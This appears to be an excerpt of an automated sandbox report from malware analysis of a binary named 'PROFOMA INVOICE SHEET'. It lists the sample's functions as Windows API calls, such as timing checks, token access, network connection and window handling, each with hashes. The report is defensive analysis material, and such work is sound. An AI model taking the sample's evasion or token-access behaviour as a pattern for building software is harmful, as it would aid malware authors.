                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    • Opcode ID: b65c2e5ce0abc87eca89d46d7c57f785ff4c23b257e5df0a7d2e10acf35501fb
                                    • Instruction ID: d5f8b7b332f0cc16d14d418bf6336d474e9810714e341f22e134477d39b633e3
                                    • Opcode Fuzzy Hash: b65c2e5ce0abc87eca89d46d7c57f785ff4c23b257e5df0a7d2e10acf35501fb
                                    • Instruction Fuzzy Hash: 2D11E1B02053009BE7238F16DD0CBA27BFCEB00B08F90C16AA616D6055DB71E904CB60
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B0C4
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B0E9
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B0F3
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 4d2edb5ffeb0041bac02a231169afb708cab716caff2e9d0257419720b5e8650
                                    • Instruction ID: 098c9e1220791d3a45f0402581f1daab4bf1de5a2cf51d30e153a2cb0e3c7cff
                                    • Opcode Fuzzy Hash: 4d2edb5ffeb0041bac02a231169afb708cab716caff2e9d0257419720b5e8650
                                    • Instruction Fuzzy Hash: BD115E31C1151DE7CF029FE4D9596EEFF78FF0A711F118086D981B2149CB3196908B59
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00362DC5
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00362DD6
                                    • GetCurrentThreadId.KERNEL32 ref: 00362DDD
                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00362DE4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 8a4fe7f19e1e68ce65ce7db13e9c7c2dd87b0369311a54aff80a758c4bbc4d03
                                    • Instruction ID: 0981be77ce495822c156be125a0da602311da3aca189119ba4e8a3c11d4817f6
                                    • Opcode Fuzzy Hash: 8a4fe7f19e1e68ce65ce7db13e9c7c2dd87b0369311a54aff80a758c4bbc4d03
                                    • Instruction Fuzzy Hash: 19E09271111624BBDB221B769C0DFEB3E6CFF42BA1F455416F105D10909AA6C840C6B0
                                    APIs
                                      • Part of subcall function 00319639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00319693
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196A2
                                      • Part of subcall function 00319639: BeginPath.GDI32(?), ref: 003196B9
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196E2
                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00398887
                                    • LineTo.GDI32(?,?,?), ref: 00398894
                                    • EndPath.GDI32(?), ref: 003988A4
                                    • StrokePath.GDI32(?), ref: 003988B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: 4c74df59e61eeb0213f53b189d66db64e0d78fa744def33d6beae08dd490423f
                                    • Instruction ID: cb31a9b7bdd83e00d20ccaa8560f2cdf30afbb6f4ccf36538a0581e2c6b0a509
                                    • Opcode Fuzzy Hash: 4c74df59e61eeb0213f53b189d66db64e0d78fa744def33d6beae08dd490423f
                                    • Instruction Fuzzy Hash: 94F03A36056259BBDB136F94AC09FCA3B5DAF0A310F048002FA11651E1C7765551CBF9
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 003198CC
                                    • SetTextColor.GDI32(?,?), ref: 003198D6
                                    • SetBkMode.GDI32(?,00000001), ref: 003198E9
                                    • GetStockObject.GDI32(00000005), ref: 003198F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$ModeObjectStockText
                                    • String ID:
                                    • API String ID: 4037423528-0
                                    • Opcode ID: c14c8645b93f0902e96b666f33a6f78105f44c5bb956cd10b79510bb5f5ad9b7
                                    • Instruction ID: 9541b98ab9ea711b76f1dfe76f7302cf80f4f6c00d23481a3e49f71c0c2b8d8b
                                    • Opcode Fuzzy Hash: c14c8645b93f0902e96b666f33a6f78105f44c5bb956cd10b79510bb5f5ad9b7
                                    • Instruction Fuzzy Hash: 90E06D31254280ABDB225B75BC09BE93F24AB12336F05821BFAFA980E1C7724644DB10
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 00361634
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,003611D9), ref: 0036163B
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003611D9), ref: 00361648
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,003611D9), ref: 0036164F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 8a52e01e920550d2d6b0c2ff614c013538027f4577ad08f2628263d7b7f8073d
                                    • Instruction ID: 35a872929527288e9c459694df9e96ed38c772d69b01cb7ca0b79e9676e1cda5
                                    • Opcode Fuzzy Hash: 8a52e01e920550d2d6b0c2ff614c013538027f4577ad08f2628263d7b7f8073d
                                    • Instruction Fuzzy Hash: 78E08635611211EBDB211FA09E0DB463B7CBF44791F19C809F645C9084D6358440C760
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0035D858
                                    • GetDC.USER32(00000000), ref: 0035D862
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0035D882
                                    • ReleaseDC.USER32(?), ref: 0035D8A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: b60d5e47f539ee1ceea9e7098e23f10fa7cdca3e9d8f3503fc191326af237468
                                    • Instruction ID: 3edef3ab4dd393778caf2a171198737e8cdb0d6ea79d44219a7724bed3b667db
                                    • Opcode Fuzzy Hash: b60d5e47f539ee1ceea9e7098e23f10fa7cdca3e9d8f3503fc191326af237468
                                    • Instruction Fuzzy Hash: 02E01AB1810205DFCF429FA0D808A6DBBB9FB08311F18A00AE806E7250CB3A9941EF50
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0035D86C
                                    • GetDC.USER32(00000000), ref: 0035D876
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0035D882
                                    • ReleaseDC.USER32(?), ref: 0035D8A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: db36e473f7d330250b5367eee535831b87fd552685f310025e2bba30ab2274fd
                                    • Instruction ID: 10cd86cd1543f19519fc740467703832fb78ffdfde99eadc92eb489b9e3a026f
                                    • Opcode Fuzzy Hash: db36e473f7d330250b5367eee535831b87fd552685f310025e2bba30ab2274fd
                                    • Instruction Fuzzy Hash: 0FE09AB5810205DFCF529FA0D80866DBBB9BB08311F18A44AE946E7250CB3A9941DF50
                                    APIs
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00374ED4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Connection_wcslen
                                    • String ID: *$LPT
                                    • API String ID: 1725874428-3443410124
                                    • Opcode ID: 97076fae356d9911e30484311f1a866d3f058870f78bc34d524ee1738c2eb209
                                    • Instruction ID: da56c5b5aa4965384ea5ac4abc4b920719116a2e2a4f627213df4c5391037f95
                                    • Opcode Fuzzy Hash: 97076fae356d9911e30484311f1a866d3f058870f78bc34d524ee1738c2eb209
                                    • Instruction Fuzzy Hash: 99918075A002049FCB26DF58C494EAABBF5BF49304F19C099E40A9F7A2C735ED85CB91
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0032E30D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: 217239a449fdd0038f79847e0c5badb3c603cb8b12998f8378ab6b155eac4962
                                    • Instruction ID: ae39caf868694add03047262d0a7d1678523c19d6b388f206f3b3da162c3aa68
                                    • Opcode Fuzzy Hash: 217239a449fdd0038f79847e0c5badb3c603cb8b12998f8378ab6b155eac4962
                                    • Instruction Fuzzy Hash: 78516FB1A0C202D6CB37B718E9833BA3BACEF40741F354D58E4D6462E9DB358C919B46
                                    APIs
                                    • CharUpperBuffW.USER32(0035569E,00000000,?,0039CC08,?,00000000,00000000), ref: 003878DD
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • CharUpperBuffW.USER32(0035569E,00000000,?,0039CC08,00000000,?,00000000,00000000), ref: 0038783B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper$_wcslen
                                    • String ID: <s<
                                    • API String ID: 3544283678-4182610772
                                    • Opcode ID: e9272d44f6918d6189e6b53405437666b52b57e1789fb1701156922ab573ade7
                                    • Instruction ID: 8d3f625abbbb853ded38fdad42c3897aa97eaf2dcf7168aeb7cad137c3a56b6c
                                    • Opcode Fuzzy Hash: e9272d44f6918d6189e6b53405437666b52b57e1789fb1701156922ab573ade7
                                    • Instruction Fuzzy Hash: 41615E76925218ABCF06FBA4CCA2DFDB379BF14700B544169F542AB091EF309A45CBA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #
                                    • API String ID: 0-1885708031
                                    • Opcode ID: d3dbde64778f2a81c26993ba644dcdac5579434c260cdb6bae7afe5f3c7ed9c7
                                    • Instruction ID: e5920fa7d40c58388759ec0879f59e82423c5fce53a7ef52bf344a5784018ed9
                                    • Opcode Fuzzy Hash: d3dbde64778f2a81c26993ba644dcdac5579434c260cdb6bae7afe5f3c7ed9c7
                                    • Instruction Fuzzy Hash: 405110319002569FDB1FEF28C0A1AFA7BA8EF19311F244455FC919B2E0D6319E87CB90
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 0031F2A2
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0031F2BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: f6928feb9e883e4f9d90d642c70103846a78e5ea7f9ac97fdccb88a5b4a2365a
                                    • Instruction ID: 056cadb344870c8748d20df177e92b220c169a02063c1742082f20370ae998f4
                                    • Opcode Fuzzy Hash: f6928feb9e883e4f9d90d642c70103846a78e5ea7f9ac97fdccb88a5b4a2365a
                                    • Instruction Fuzzy Hash: 565173728187459BD321AF10D896BABBBF8FB84304F81894CF2D9410A5EB309529CB67
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003857E0
                                    • _wcslen.LIBCMT ref: 003857EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper_wcslen
                                    • String ID: CALLARGARRAY
                                    • API String ID: 157775604-1150593374
                                    • Opcode ID: 9b8dd8839f81790c89686113871cf6818c77574f9bb48801b594bc8db8d740f0
                                    • Instruction ID: 023440702281a602f9f55451f15747d81a745b7018d913514a4c2c7fdc6aacb5
                                    • Opcode Fuzzy Hash: 9b8dd8839f81790c89686113871cf6818c77574f9bb48801b594bc8db8d740f0
                                    • Instruction Fuzzy Hash: DB41A231E002159FCB06EFA9C8819FEBBB5FF59310F1140AAE505AB291D7709D81CF90
                                    APIs
                                    • _wcslen.LIBCMT ref: 0037D130
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0037D13A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CrackInternet_wcslen
                                    • String ID: |
                                    • API String ID: 596671847-2343686810
                                    • Opcode ID: cc2b102002e09781e0e493a42ae451e31d5e812ccd526fd5060fa5791e1fbc01
                                    • Instruction ID: 66e2d5b0184af89c649ceb1f3e4990f62c069f0a347c1b7409fd9e8f24a43e0d
                                    • Opcode Fuzzy Hash: cc2b102002e09781e0e493a42ae451e31d5e812ccd526fd5060fa5791e1fbc01
                                    • Instruction Fuzzy Hash: 08315071D01219ABCF12EFA4CD95AEE7FB9FF04300F004019F819AA166D735AA16CB60
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00393621
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0039365C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 8e09e7689dd656e1c6d52fb23b6b49a2196f074c7b7590528fe9e2f17804991d
                                    • Instruction ID: 3fa01195d2842aa1b70e5b42fd7c0b9febf07afaf726bba0d8248f2054706fa8
                                    • Opcode Fuzzy Hash: 8e09e7689dd656e1c6d52fb23b6b49a2196f074c7b7590528fe9e2f17804991d
                                    • Instruction Fuzzy Hash: 1A31ADB1110204AEEB12DF68DC80EFB73A9FF89720F019619F8A5D7280DA31AD91C760
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0039461F
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00394634
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: abce2c44f01568a2661b610bd62038242ab46e09c199634708f05f845dc06371
                                    • Instruction ID: d2022b13f867513d36af265eac51aad871ac9db6f15613db04530c1bdefd1ba0
                                    • Opcode Fuzzy Hash: abce2c44f01568a2661b610bd62038242ab46e09c199634708f05f845dc06371
                                    • Instruction Fuzzy Hash: 753117B5A013099FDF15CFA9D990BDABBB9FB0A300F15416AE905AB341D770A942CF90
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0039327C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00393287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 0bb09582eb573d103a8f7994054025e83033fe8445dcdab5f8ab6dc850d81754
                                    • Instruction ID: df63ddbd6e9d6e711c90fc8f2e8bd57fc8059c77eb67ececb57d5955f5a98a90
                                    • Opcode Fuzzy Hash: 0bb09582eb573d103a8f7994054025e83033fe8445dcdab5f8ab6dc850d81754
                                    • Instruction Fuzzy Hash: 7A11E2B13002087FFF229F94DC80EBB376EEB94364F110929F9589B290D6319D518760
                                    APIs
                                      • Part of subcall function 0030600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0030604C
                                      • Part of subcall function 0030600E: GetStockObject.GDI32(00000011), ref: 00306060
                                      • Part of subcall function 0030600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030606A
                                    • GetWindowRect.USER32(00000000,?), ref: 0039377A
                                    • GetSysColor.USER32(00000012), ref: 00393794
                                    Strings
                                    Memory Dump Source
